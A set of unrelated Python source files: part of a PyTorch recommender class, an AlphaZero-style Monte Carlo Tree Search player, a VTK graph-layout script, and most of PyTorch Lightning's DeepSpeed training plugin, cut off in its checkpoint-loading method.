users = torch.from_numpy(user_indices).long().to(self.device)
items = torch.from_numpy(item_indices).long().to(self.device)
outputs = self.model(users, items)
return outputs.data.cpu().numpy()
def update_history_rating_matrix(self):
"""
Update history rating matrix.
:return: self.
"""
self.history_rating_matrix = pd.DataFrame(index=self.index_2_user, columns=self.index_2_item)
for i, j, k in self.user_item_pairs.values:
if i and j and k:
self.history_rating_matrix[j][i] = k
return self
def update_pred_rating_matrix(self):
"""
Update prediction rating matrix.
:return: self.
"""
pred_matrix = self.model.get_rating_matrix().data.cpu().numpy()
self.pred_rating_matrix = np.where(self.history_rating_matrix.isna(), pred_matrix, np.nan)
return self
# def get_single_rating(self, i, j):
# return self.pred_rating_matrix[i][j] if not np.isnan(self.pred_rating_matrix[i][j])\
# else self.history_rating_matrix.values[i][j]
#
# def predict_ratings_with_matrix(self, user_item_pairs):
# """
# Predict the ratings of the pairs of (user, item).
# :param user_item_pairs: list of (user, item)
# :return: ratings. size=[nb_pairs]
# """
# pairs = pd.DataFrame(user_item_pairs)
# users = self.users_to_indices(pairs[0])
# items = self.items_to_indices(pairs[1])
# return np.array([self.get_single_rating(users[i], items[i]) for i in range(len(user_item_pairs))])
def predict_ratings(self, user_item_pairs):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:return: ratings. size=[nb_pairs]
"""
return self.predict(user_item_pairs).ravel()
def recommend(self, users, nb_recommendation):
"""
return the recommendations and their corresponding ratings.
:param users: array of users
:param nb_recommendation: The number of items to be recommended.
:return: Indices of recommended items and their corresponding scores.
"""
user_indices = self.users_to_indices(users)
id_recommend, rating_recommend = top_k(np.where(np.isnan(self.pred_rating_matrix[user_indices, :]),
-np.inf, self.pred_rating_matrix[user_indices, :]),
k=nb_recommendation, axis=-1, reverse=True, sort=True)
return id_recommend, rating_recommend
def users_to_indices(self, users):
return np.array([self.user_2_index[user] for user in users]).ravel()
def indices_to_users(self, indices):
return self.index_2_user[np.array(indices).ravel()]
def items_to_indices(self, items):
return np.array([self.item_2_index[item] for item in items]).ravel()
def indices_to_items(self, indices):
return self.index_2_item[np.array(indices).ravel()]
|
import numpy as np
import copy
def softmax(x):
probs = np.exp(x - np.max(x))
probs /= np.sum(probs)
return probs
class TreeNode(object):
"""A node in the MCTS tree. Each node keeps track of its own value Q, prior probability P, and
its visit-count-adjusted prior score u.
"""
def __init__(self, parent, prior_p):
self._parent = parent
self._children = {} # a map from action to TreeNode
self._n_visits = 0
self._Q = 0
self._u = 0
self._P = prior_p
def expand(self, action_priors):
"""Expand tree by creating new children.
action_priors -- output from policy function - a list of tuples of actions
and their prior probability according to the policy function.
"""
for action, prob in action_priors:
if action not in self._children:
self._children[action] = TreeNode(self, prob)
def select(self, c_puct):
"""Select action among children that gives maximum action value, Q plus bonus u(P).
Returns:
A tuple of (action, next_node)
"""
return max(self._children.items(), key=lambda act_node: act_node[1].get_value(c_puct))
def update(self, leaf_value):
"""Update node values from leaf evaluation.
Arguments:
leaf_value -- the value of subtree evaluation from the current player's perspective.
"""
# Count visit.
self._n_visits += 1
# Update Q, a running average of values for all visits.
self._Q += 1.0*(leaf_value - self._Q) / self._n_visits
def update_recursive(self, leaf_value):
"""Like a call to update(), but applied recursively for all ancestors.
"""
# If it is not root, this node's parent should be updated first.
if self._parent:
self._parent.update_recursive(-leaf_value)
self.update(leaf_value)
def get_value(self, c_puct):
"""Calculate and return the value for this node: a combination of leaf evaluations, Q, and
this node's prior adjusted for its visit count, u
c_puct -- a number in (0, inf) controlling the relative impact of values, Q, and
prior probability, P, on this node's score.
"""
self._u = c_puct * self._P * np.sqrt(self._parent._n_visits) / (1 + self._n_visits)
return self._Q + self._u
def is_leaf(self):
"""Check if leaf node (i.e. no nodes below this have been expanded).
"""
return self._children == {}
def is_root(self):
return self._parent is None
class MCTS(object):
"""A simple implementation of Monte Carlo Tree Search.
"""
def __init__(self, policy_value_fn, c_puct=5, n_playout=10000):
"""Arguments:
policy_value_fn -- a function that takes in a board state and outputs a list of (action, probability)
tuples and also a score in [-1, 1] (i.e. the expected value of the end game score from
the current player's perspective) for the current player.
c_puct -- a number in (0, inf) that controls how quickly exploration converges to the
maximum-value policy, where a higher value means relying on the prior more
"""
self._root = TreeNode(None, 1.0)
self._policy = policy_value_fn
self._c_puct = c_puct
self._n_playout = n_playout
def _playout(self, state):
"""Run a single playout from the root to the leaf, getting a value at the leaf and
propagating it back through its parents. State is modified in-place, so a copy must be
provided.
Arguments:
state -- a copy of the state.
"""
node = self._root
while(1):
if node.is_leaf():
break
# Greedily select next move.
action, node = node.select(self._c_puct)
state.do_move(action)
# Evaluate the leaf using a network which outputs a list of (action, probability)
# tuples p and also a score v in [-1, 1] for the current player.
action_probs, leaf_value = self._policy(state)
# Check for end of game.
end, winner = state.game_end()
if not end:
node.expand(action_probs)
else:
# for end state,return the "true" leaf_value
if winner == -1: # tie
leaf_value = 0.0
else:
leaf_value = 1.0 if winner == state.get_current_player() else -1.0
# Update value and visit count of nodes in this traversal.
node.update_recursive(-leaf_value)
def get_move_probs(self, state, temp=1e-3):
"""Runs all playouts sequentially and returns the available actions and their corresponding probabilities
Arguments:
state -- the current state, including both game state and the current player.
temp -- temperature parameter in (0, 1] that controls the level of exploration
Returns:
the available actions and the corresponding probabilities
"""
for n in range(self._n_playout):
state_copy = copy.deepcopy(state)
self._playout(state_copy)
# calc the move probabilities based on the visit counts at the root node
act_visits = [(act, node._n_visits) for act, node in self._root._children.items()]
acts, visits = zip(*act_visits)
act_probs = softmax(1.0/temp * np.log(np.array(visits) + 1e-10))
return acts, act_probs
def update_with_move(self, last_move):
"""Step forward in the tree, keeping everything we already know about the subtree.
"""
if last_move in self._root._children:
self._root = self._root._children[last_move]
self._root._parent = None
else:
self._root = TreeNode(None, 1.0)
def __str__(self):
return "MCTS"
class MCTSPlayer(object):
"""AI player based on MCTS"""
def __init__(self, policy_value_function, c_puct=5, n_playout=2000, is_selfplay=0):
self.mcts = MCTS(policy_value_function, c_puct, n_playout)
self._is_selfplay = is_selfplay
def set_player_ind(self, p):
self.player = p
def reset_player(self):
self.mcts.update_with_move(-1)
def get_action(self, board, temp=1e-3, return_prob=0):
sensible_moves = board.availables
move_probs = np.zeros(board.width*board.height) # the pi vector returned by MCTS as in the alphaGo Zero paper
if len(sensible_moves) > 0:
acts, probs = self.mcts.get_move_probs(board, temp)
move_probs[list(acts)] = probs
if self._is_selfplay:
# add Dirichlet Noise for exploration (needed for self-play training)
move = np.random.choice(acts, p=0.75*probs + 0.25*np.random.dirichlet(0.3*np.ones(len(probs))))
self.mcts.update_with_move(move) # update the root node and reuse the search tree
else:
# with the default temp=1e-3, this is almost equivalent to choosing the move with the highest prob
move = np.random.choice(acts, p=probs)
# reset the root node
self.mcts.update_with_move(-1)
# location = board.move_to_location(move)
# print("AI move: %d,%d\n" % (location[0], location[1]))
if return_prob:
return move, move_probs
else:
return move
else:
print("WARNING: the board is full")
def __str__(self):
return "MCTS {}".format(self.player)
|
#!/usr/bin/env python
from vtk import *
source = vtkRandomGraphSource()
source.SetNumberOfVertices(15)
source.SetStartWithTree(True)
source.SetIncludeEdgeWeights(True)
bfs = vtkBoostBreadthFirstSearch()
bfs.AddInputConnection(source.GetOutputPort())
bfs.SetOriginVertex(0)
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(bfs.GetOutputPort())
view.SetVertexLabelArrayName("BFS")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("BFS")
view.SetColorVertices(True)
view.SetEdgeColorArrayName("edge weight")
view.SetColorEdges(True)
view.SetLayoutStrategyToSimple2D()
view.SetVertexLabelFontSize(20)
theme = vtkViewTheme.CreateNeonTheme()
theme.SetLineWidth(5)
theme.SetPointSize(10)
view.ApplyViewTheme(theme)
theme.FastDelete()
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view.GetInteractor().Start()
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import json
import logging
import os
import platform
from collections import OrderedDict
from pathlib import Path
from typing import Any, Callable, Dict, Generator, List, Mapping, Optional, Tuple, Union
import torch
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.overrides.base import _LightningModuleWrapperBase
from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment
from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO
from pytorch_lightning.plugins.training_type.ddp import DDPPlugin
from pytorch_lightning.trainer.optimizers import _get_default_scheduler_config
from pytorch_lightning.trainer.states import TrainerFn
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.apply_func import apply_to_collection
from pytorch_lightning.utilities.distributed import log, rank_zero_info, rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _DEEPSPEED_AVAILABLE
from pytorch_lightning.utilities.seed import reset_seed
from pytorch_lightning.utilities.types import _PATH, LRSchedulerTypeTuple
from pytorch_lightning.utilities.warnings import rank_zero_warn, WarningCache
warning_cache = WarningCache()
if _DEEPSPEED_AVAILABLE:
import deepspeed
def remove_module_hooks(model: torch.nn.Module) -> None:
# todo (tchaton) awaiting this feature to move upstream to DeepSpeed
for module in model.modules():
module._backward_hooks = OrderedDict()
module._is_full_backward_hook = None
module._forward_hooks = OrderedDict()
module._forward_pre_hooks = OrderedDict()
module._state_dict_hooks = OrderedDict()
module._load_state_dict_pre_hooks = OrderedDict()
class LightningDeepSpeedModule(_LightningModuleWrapperBase):
def __init__(self, pl_module: "pl.LightningModule", precision: int) -> None:
super().__init__(pl_module)
self.precision = precision
def forward(self, *inputs, **kwargs):
if self.precision == 16:
inputs = self._move_float_tensors_to_half(inputs)
return super().forward(*inputs, **kwargs)
@staticmethod
def batch_to(data):
return data.half()
def _move_float_tensors_to_half(self, batch: Any):
batch = apply_to_collection(batch, (torch.FloatTensor, torch.cuda.FloatTensor), function=self.batch_to)
return batch
class DeepSpeedPlugin(DDPPlugin):
distributed_backend = "deepspeed"
DEEPSPEED_ENV_VAR = "PL_DEEPSPEED_CONFIG_PATH"
def __init__(
self,
zero_optimization: bool = True,
stage: int = 2,
remote_device: str = "cpu",
offload_optimizer: bool = False,
offload_parameters: bool = False,
offload_params_device: str = "cpu",
nvme_path: str = "/local_nvme",
params_buffer_count: int = 5,
params_buffer_size: int = 1e8,
max_in_cpu: int = 1e9,
offload_optimizer_device: str = "cpu",
optimizer_buffer_count: int = 4,
block_size: int = 1048576,
queue_depth: int = 8,
single_submit: bool = False,
overlap_events: bool = True,
thread_count: int = 1,
pin_memory: bool = False,
sub_group_size: int = 1e12,
contiguous_gradients: bool = True,
overlap_comm: bool = True,
allgather_partitions: bool = True,
reduce_scatter: bool = True,
allgather_bucket_size: int = 2e8,
reduce_bucket_size: int = 2e8,
zero_allow_untested_optimizer: bool = True,
logging_batch_size_per_gpu: Union[str, int] = "auto",
config: Optional[Union[Path, str, dict]] = None,
logging_level: int = logging.WARN,
num_nodes: Optional[int] = None,
parallel_devices: Optional[List[torch.device]] = None,
cluster_environment: Optional[ClusterEnvironment] = None,
loss_scale: float = 0,
initial_scale_power: int = 16,
loss_scale_window: int = 1000,
hysteresis: int = 2,
min_loss_scale: int = 1,
partition_activations: bool = False,
cpu_checkpointing: bool = False,
contiguous_memory_optimization: bool = False,
synchronize_checkpoint_boundary: bool = False,
load_full_weights: bool = False,
partition_module: bool = True,
) -> None:
"""Provides capabilities to run training using the DeepSpeed library, with training optimizations for large
billion parameter models. `For more information: https://pytorch-
lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed`.
.. warning:: ``DeepSpeedPlugin`` is in beta and subject to change.
Defaults have been set to enable ZeRO-Offload and some have been taken from the link below.
These defaults have been set generally, but may require tuning for optimum performance based on your model size.
`For more information: https://www.deepspeed.ai/docs/config-json/#zero-optimizations-for-fp16-training`.
Arguments:
zero_optimization: Enable ZeRO optimization. This is only compatible with precision=16.
stage: Different stages of the ZeRO Optimizer. 0 is disabled,
1 is optimizer state partitioning, 2 is optimizer+gradient state partitioning,
3 is optimizer+gradient_parameter partitioning using the infinity engine.
remote_device: Device to instantiate the model on initially (``cpu`` or ``nvme``).
offload_optimizer: Enable offloading optimizer memory and computation to CPU or NVMe
based on ``offload_optimizer_device``.
offload_parameters: When using ZeRO Stage 3, Enable offloading parameter memory and computation
to CPU or NVMe based on ``offload_params_device``.
offload_params_device: When offloading parameters choose the device to offload to, ``cpu`` or ``nvme``.
offload_optimizer_device: When offloading optimizer state choose the device to offload to,
``cpu`` or ``nvme``.
params_buffer_count: Number of buffers in buffer pool for
parameter offloading when ``offload_params_device`` is ``nvme``.
params_buffer_size: Size of buffers in buffer pool for parameter offloading
when ``offload_params_device`` is ``nvme``.
max_in_cpu: Number of parameter elements to maintain in CPU memory when offloading to NVMe is enabled.
nvme_path: Filesystem path for NVMe device for optimizer/parameter state offloading.
optimizer_buffer_count: Number of buffers in buffer pool for optimizer state offloading
when ``offload_optimizer_device`` is set to to ``nvme``.
This should be at least the number of states maintained per parameter by the optimizer.
For example, Adam optimizer has 4 states (parameter, gradient, momentum, and variance).
block_size: When using NVMe Offloading, the I/O block size in bytes.
queue_depth: When using NVMe Offloading, the I/O queue depth.
single_submit: When using NVMe Offloading,
submit requests to storage device as multiple individual requests,
as opposed to one block of requests.
overlap_events: When using NVMe Offloading,
submit requests to storage device in an overlapped fashion
without waiting for completion of earlier requests.
thread_count: When using NVMe Offloading,
Intra-request parallelism for each read/write submitted by a user thread.
pin_memory: When using ZeRO stage 3, pin optimizer state memory on CPU.
This could boost throughput at the cost of extra memory overhead.
sub_group_size: When using ZeRO stage 3, defines the number of parameters
within a sub group to offload at a time.
Smaller numbers require more communication, but improve memory efficiency.
contiguous_gradients: Copies gradients to a continuous buffer as they are produced.
Avoids memory fragmentation during backwards. Useful when training large models.
overlap_comm: Overlap the reduction (synchronization) of gradients with the backwards computation.
This is a speed optimization when training across multiple GPUs/machines.
allgather_partitions: All gather updated parameters at the end of training step,
instead of using a series of broadcast collectives.
reduce_scatter: Use reduce/scatter instead of allreduce to average gradients.
allgather_bucket_size: Number of elements to allgather at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
reduce_bucket_size: Number of elements to reduce at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
zero_allow_untested_optimizer: Allow untested optimizers to be used with ZeRO. Currently only Adam is a
DeepSpeed supported optimizer when using ZeRO.
logging_batch_size_per_gpu: Config used in DeepSpeed to calculate verbose timing for logging
on a per sample per second basis (only displayed if logging=logging.INFO).
If set to "auto", the plugin tries to infer this from
the train DataLoader's BatchSampler, else defaults to 1.
To obtain accurate logs when using datasets that do not support batch samplers,
set this to the actual per gpu batch size (trainer.batch_size).
config: Pass in a deepspeed formatted config dict,
or path to a deepspeed config: https://www.deepspeed.ai/docs/config-json.
All defaults will be ignored if a config is passed in.
logging_level: Set logging level for deepspeed.
loss_scale: Loss scaling value for FP16 training.
0.0 results in dynamic loss scaling, otherwise static.
initial_scale_power: Power of the initial dynamic loss scale value. Loss scale is computed
by ``2^initial_scale_power``.
loss_scale_window: Window in which to raise/lower the dynamic FP16 loss scaling value.
hysteresis: FP16 Delay shift in Dynamic Loss scaling.
min_loss_scale: The minimum FP16 dynamic loss scaling value.
partition_activations: Enables partition activation when used with ZeRO stage 3 and model parallelism.
Still requires you to wrap your forward functions in deepspeed.checkpointing.checkpoint.
See `deepspeed tutorial
<https://www.deepspeed.ai/tutorials/megatron/#deepspeed-activation-checkpoints-optional>`_.
cpu_checkpointing: Offloads partitioned activations to CPU if ``partition_activations`` is enabled.
contiguous_memory_optimization: Copies partitioned activations so that they are contiguous in memory.
Not supported by all models.
synchronize_checkpoint_boundary: Insert :func:`torch.cuda.synchronize` at each checkpoint boundary.
load_full_weights: True when loading a single checkpoint file containing the model state dict
when using ZeRO Stage 3. This differs from the DeepSpeed checkpoint which contains shards
per worker.
partition_module: When True, partitions the ``LightningModule`` across devices when using ZeRO Stage 3.
This is the default behaviour to ensure that the entire module is appropriately initialized
for DeepSpeed. When False we do not explicitly convert the model, which is fine if NO layers
or ALL layers are defined in ``configure_sharded_model``. This is useful for layers such as
``torch.nn.RNN`` which do internal logic when moving to device.
"""
if not _DEEPSPEED_AVAILABLE:
raise MisconfigurationException(
"To use the DeepSpeed plugin, you must have DeepSpeed installed. pip install deepspeed"
)
super().__init__(
parallel_devices=parallel_devices,
num_nodes=num_nodes,
cluster_environment=cluster_environment,
)
self.config = self._load_config(config)
if self.config is None:
# User has not overridden config, set defaults
self.config = self._create_default_config(
zero_optimization,
zero_allow_untested_optimizer,
logging_batch_size_per_gpu,
offload_optimizer=offload_optimizer,
offload_parameters=offload_parameters,
nvme_path=nvme_path,
offload_params_device=offload_params_device,
params_buffer_count=params_buffer_count,
params_buffer_size=params_buffer_size,
max_in_cpu=max_in_cpu,
pin_memory=pin_memory,
offload_optimizer_device=offload_optimizer_device,
optimizer_buffer_count=optimizer_buffer_count,
block_size=block_size,
queue_depth=queue_depth,
single_submit=single_submit,
overlap_events=overlap_events,
thread_count=thread_count,
partition_activations=partition_activations,
cpu_checkpointing=cpu_checkpointing,
contiguous_memory_optimization=contiguous_memory_optimization,
synchronize_checkpoint_boundary=synchronize_checkpoint_boundary,
stage=stage,
contiguous_gradients=contiguous_gradients,
overlap_comm=overlap_comm,
allgather_partitions=allgather_partitions,
reduce_scatter=reduce_scatter,
allgather_bucket_size=allgather_bucket_size,
reduce_bucket_size=reduce_bucket_size,
sub_group_size=sub_group_size,
)
self._config_initialized = False
deepspeed.utils.logging.logger.setLevel(logging_level)
self.remote_device = remote_device
self.load_full_weights = load_full_weights
self.partition_module = partition_module
# default FP16 parameters.
self.loss_scale = loss_scale
self.initial_scale_power = initial_scale_power
self.loss_scale_window = loss_scale_window
self.hysteresis = hysteresis
self.min_loss_scale = min_loss_scale
def _load_config(self, config):
if config is None and self.DEEPSPEED_ENV_VAR in os.environ:
rank_zero_info(f"Loading DeepSpeed config from set {self.DEEPSPEED_ENV_VAR} environment variable")
config = os.environ[self.DEEPSPEED_ENV_VAR]
if isinstance(config, (str, Path)):
if not os.path.isfile(config):
raise MisconfigurationException(
f"You passed in a path to a DeepSpeed config but the path does not exist: {config}"
)
with open(config) as f:
config = json.load(f)
return config
def setup_distributed(self):
reset_seed()
# determine which process we are and world size
self.set_world_ranks()
self._init_deepspeed_distributed()
if not self._config_initialized:
self._format_config()
self._config_initialized = True
def _init_deepspeed_distributed(self) -> None:
if platform.system() != "Windows":
# do not set env variables on windows, allow deepspeed to control setup
self._set_node_environment_variables()
log.info(
"initializing deepspeed distributed: "
f"GLOBAL_RANK: {self.global_rank}, "
f"MEMBER: {self.global_rank + 1}/{self.world_size}"
)
deepspeed.init_distributed(
self.torch_distributed_backend, distributed_port=self.cluster_environment.master_port()
)
def _set_node_environment_variables(self) -> None:
os.environ["MASTER_ADDR"] = self.cluster_environment.master_address()
os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port())
os.environ["RANK"] = str(self.global_rank)
os.environ["WORLD_SIZE"] = str(self.world_size)
os.environ["LOCAL_RANK"] = str(self.local_rank)
@property
def restore_checkpoint_after_pre_dispatch(self) -> bool:
return True
def pre_dispatch(self):
self.init_deepspeed()
self.barrier()
def init_deepspeed(self):
accumulation_scheduler = self.lightning_module.trainer.accumulation_scheduler
if accumulation_scheduler.epochs != [0]:
raise MisconfigurationException(
"DeepSpeed currently does not support different `accumulate_grad_batches` at different epochs."
)
precision = self.lightning_module.trainer.accelerator.precision
model = LightningDeepSpeedModule(pl_module=self.model, precision=precision)
if self.zero_stage_3 and self.partition_module:
# Ensure the entire model has been moved to the appropriate device
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
deepspeed.zero.Init(
module=model, remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
if self.lightning_module.trainer and self.lightning_module.trainer.training:
self._initialize_deepspeed_train(model)
else:
self._initialize_deepspeed_inference(model)
def _init_optimizers(self) -> Tuple[Optimizer, Optional[Union[LRSchedulerTypeTuple]], Optional[int]]:
optimizers, schedulers, optimizer_frequencies = self.lightning_module.trainer.init_optimizers(
self.lightning_module
)
if len(optimizers) > 1 or len(schedulers) > 1:
raise MisconfigurationException(
"DeepSpeed currently only supports single optimizer, single optional scheduler."
)
return (
optimizers[0],
schedulers[0] if schedulers else _get_default_scheduler_config(),
optimizer_frequencies[0] if optimizer_frequencies else None,
)
@property
def zero_stage_3(self) -> bool:
return self.config.get("zero_optimization") and self.config.get("zero_optimization").get("stage") == 3
def _initialize_deepspeed_train(self, model):
if "optimizer" in self.config:
optimizer, lr_scheduler = None, _get_default_scheduler_config()
else:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
model_parameters = filter(lambda p: p.requires_grad, self.model.parameters())
model, deepspeed_optimizer, _, deepspeed_scheduler = deepspeed.initialize(
config=self.config,
model=model,
model_parameters=model_parameters,
optimizer=optimizer,
lr_scheduler=scheduler,
dist_init_required=False,
)
self._set_deepspeed_activation_checkpointing()
# although we set these here, deepspeed manages the specific optimizer logic
self.lightning_module.trainer.optimizers = [deepspeed_optimizer]
deepspeed_scheduler = model.lr_scheduler
if deepspeed_scheduler is not None:
# disable deepspeed lr scheduling as lightning manages scheduling
model.lr_scheduler = None
lr_scheduler["scheduler"] = deepspeed_scheduler
self.lightning_module.trainer.lr_schedulers = [lr_scheduler]
self.model = model
@contextlib.contextmanager
def model_sharded_context(self) -> Generator[None, None, None]:
if self.zero_stage_3:
assert self._config_initialized
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
model_parallel_context = deepspeed.zero.Init(
remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
else:
model_parallel_context = super().model_sharded_context()
with model_parallel_context:
yield
@property
def precision(self) -> Union[str, int]:
return self.lightning_module.trainer.precision
def _set_deepspeed_activation_checkpointing(self):
if self.config.get("activation_checkpointing"):
checkpoint_config = self.config["activation_checkpointing"]
deepspeed.checkpointing.configure(
mpu_=None,
partition_activations=checkpoint_config.get("partition_activations"),
contiguous_checkpointing=checkpoint_config.get("contiguous_checkpointing"),
checkpoint_in_cpu=checkpoint_config.get("checkpoint_in_cpu"),
profile=checkpoint_config.get("profile"),
)
def _initialize_deepspeed_inference(self, model):
# todo: Currently DeepSpeed requires optimizers at inference to partition weights correctly
optimizer, scheduler = None, None
if "optimizer" not in self.config:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
inference_config = {
# todo: this is required for DeepSpeed throughput timers, or throughput timers will be incorrect
"train_micro_batch_size_per_gpu": 1
}
if "fp16" in self.config:
inference_config.update({"fp16": self.config["fp16"]})
if self.zero_stage_3:
inference_config.update(
{
"zero_allow_untested_optimizer": self.config["zero_allow_untested_optimizer"],
"zero_optimization": self.config["zero_optimization"],
}
)
# Remove all module hooks before initializing new model
remove_module_hooks(model)
model, _, _, _ = deepspeed.initialize(
config=inference_config,
model=model,
optimizer=optimizer,
lr_scheduler=scheduler,
model_parameters=[],
dist_init_required=False,
)
self.model = model
@property
def lightning_module(self):
# the model may not be wrapped with DeepEngine & LightningDeepSpeedModule if calling this too early
module = getattr(self.model, "module", self.model)
return module.module if isinstance(module, LightningDeepSpeedModule) else module
@property
def distributed_sampler_kwargs(self):
distributed_sampler_kwargs = dict(num_replicas=self.world_size, rank=self.global_rank)
return distributed_sampler_kwargs
def init_optimizers(self, trainer: "pl.Trainer", model: "pl.LightningModule") -> Tuple[List, List, List]:
# Skip initializing optimizers here as DeepSpeed handles optimizers via config.
# User may have specified config options instead in configure_optimizers, but this is handled
# via `_initialize_deepspeed_train`
return [], [], [] # empty optimizers, schedulers and frequencies
def optimizer_step(self, optimizer: torch.optim.Optimizer, lambda_closure: Callable, **kwargs):
# note: We rely on the deepspeed engine to carry out the step rather than the optimizer.
# internally, the engine has a reference to the optimizer already.
self.model.step(**kwargs)
@property
def handles_gradient_accumulation(self) -> bool:
"""Whether the plugin handles gradient accumulation internally."""
return True
def _format_config(self):
if self.config is None:
raise MisconfigurationException(
"To use DeepSpeed you must pass in a DeepSpeed config dict, or a path to a JSON config."
" See: https://pytorch-lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed"
)
self._format_batch_size_and_grad_accum_config()
self._format_precision_config()
def _format_batch_size_and_grad_accum_config(self):
if "gradient_accumulation_steps" in self.config:
raise MisconfigurationException(
"Do not set `gradient_accumulation_steps` in the DeepSpeed config"
" as this will be set with the `accumulate_grad_batches` argument passed via the Lightning Trainer."
)
self.config["gradient_accumulation_steps"] = self.lightning_module.trainer.accumulate_grad_batches
if "train_micro_batch_size_per_gpu" not in self.config:
rank_zero_warn(
"Inferring the batch size for internal deepspeed logging from the `train_dataloader()`. "
"If you require skipping this, please pass "
"`Trainer(plugins=DeepSpeedPlugin(logging_batch_size_per_gpu=batch_size))`"
)
batch_size = self._auto_select_batch_size()
self.config["train_micro_batch_size_per_gpu"] = batch_size
if "gradient_clipping" not in self.config:
self.config["gradient_clipping"] = self.lightning_module.trainer.gradient_clip_val
def _auto_select_batch_size(self):
# train_micro_batch_size_per_gpu is used for throughput logging purposes
# by default we try to use the batch size of the loader
batch_size = 1
if hasattr(self.lightning_module, "train_dataloader"):
train_dataloader = self.lightning_module.train_dataloader()
if hasattr(train_dataloader, "batch_sampler"):
batch_size = train_dataloader.batch_sampler.batch_size
return batch_size
def _format_precision_config(self):
amp_type = self.lightning_module.trainer.accelerator_connector.amp_type
amp_level = self.lightning_module.trainer.accelerator_connector.amp_level
precision = self.lightning_module.trainer.accelerator_connector.precision
if precision in (16, "mixed"):
if "fp16" not in self.config and amp_type == AMPType.NATIVE:
# FP16 is a DeepSpeed standalone AMP implementation
rank_zero_info("Enabling DeepSpeed FP16.")
self.config["fp16"] = {
"enabled": True,
"loss_scale": self.loss_scale,
"initial_scale_power": self.initial_scale_power,
"loss_scale_window": self.loss_scale_window,
"hysteresis": self.hysteresis,
"min_loss_scale": self.min_loss_scale,
}
elif "amp" not in self.config and amp_type == AMPType.APEX:
rank_zero_only("Enabling DeepSpeed APEX Implementation.")
self.config["amp"] = {"enabled": True, "opt_level": amp_level}
def _create_default_config(
self,
zero_optimization: bool,
zero_allow_untested_optimizer: bool,
logging_batch_size_per_gpu: Union[str, int],
partition_activations: bool,
cpu_checkpointing: bool,
contiguous_memory_optimization: bool,
synchronize_checkpoint_boundary: bool,
offload_optimizer: bool,
offload_parameters: bool,
nvme_path: str,
offload_params_device: str,
params_buffer_count: int,
params_buffer_size: int,
max_in_cpu: int,
offload_optimizer_device: str,
optimizer_buffer_count: int,
pin_memory: bool,
block_size: int,
queue_depth: int,
single_submit: bool,
overlap_events: bool,
thread_count: int,
**zero_kwargs,
) -> Dict:
cfg = {
"activation_checkpointing": {
"partition_activations": partition_activations,
"cpu_checkpointing": cpu_checkpointing,
"contiguous_memory_optimization": contiguous_memory_optimization,
"synchronize_checkpoint_boundary": synchronize_checkpoint_boundary,
},
"aio": {
"block_size": block_size,
"queue_depth": queue_depth,
"single_submit": single_submit,
"overlap_events": overlap_events,
"thread_count": thread_count,
},
}
if zero_optimization:
zero_config = zero_kwargs
if offload_optimizer:
zero_config["offload_optimizer"] = {
"device": offload_optimizer_device,
"nvme_path": nvme_path,
"buffer_count": optimizer_buffer_count,
"pin_memory": pin_memory,
}
if offload_parameters:
zero_config["offload_param"] = {
"device": offload_params_device,
"nvme_path": nvme_path,
"buffer_count": params_buffer_count,
"buffer_size": params_buffer_size,
"max_in_cpu": max_in_cpu,
"pin_memory": pin_memory,
}
cfg = {
"zero_allow_untested_optimizer": zero_allow_untested_optimizer,
"zero_optimization": zero_config,
**cfg,
}
if logging_batch_size_per_gpu != "auto":
cfg = {"train_micro_batch_size_per_gpu": logging_batch_size_per_gpu, **cfg}
return cfg
@property
def deepspeed_engine(self):
return self.model
@property
def _multi_device(self) -> bool:
return self.num_processes > 1 or self.num_nodes > 1
def save_checkpoint(self, checkpoint: Dict, filepath: _PATH) -> None:
"""Save model/training states as a checkpoint file through state-dump and file-write.
Args:
checkpoint: The checkpoint state dictionary
filepath: write-target file's path
"""
if self.zero_stage_3 and self._multi_device and self.is_global_zero:
warning_cache.warn(
"When saving the DeepSpeed Stage 3 checkpoint, "
"each worker will save a shard of the checkpoint within a directory. "
"If a single file is required after training, "
"see https://pytorch-lightning.readthedocs.io/en/latest/advanced/advanced_gpu.html#"
"deepspeed-zero-stage-3-single-file for instructions."
)
# Use deepspeed's internal checkpointing function to handle partitioned weights across processes
# dump states as a checkpoint dictionary object
_exclude_keys = ["state_dict", "optimizer_states", "lr_schedulers"]
checkpoint = {k: v for k, v in checkpoint.items() if k not in _exclude_keys}
self.deepspeed_engine.save_checkpoint(filepath, client_state=checkpoint)
def load_checkpoint(self, checkpoint_path: _PATH) -> Dict[str, Any]:
if self.load_full_weights and self.zero_stage_3:
# Broadcast to ensure we load from the rank 0 checkpoint
# This doesn't have to be the case when using deepspeed sharded checkpointing
checkpoint_path = self.broadcast(checkpoint_path)
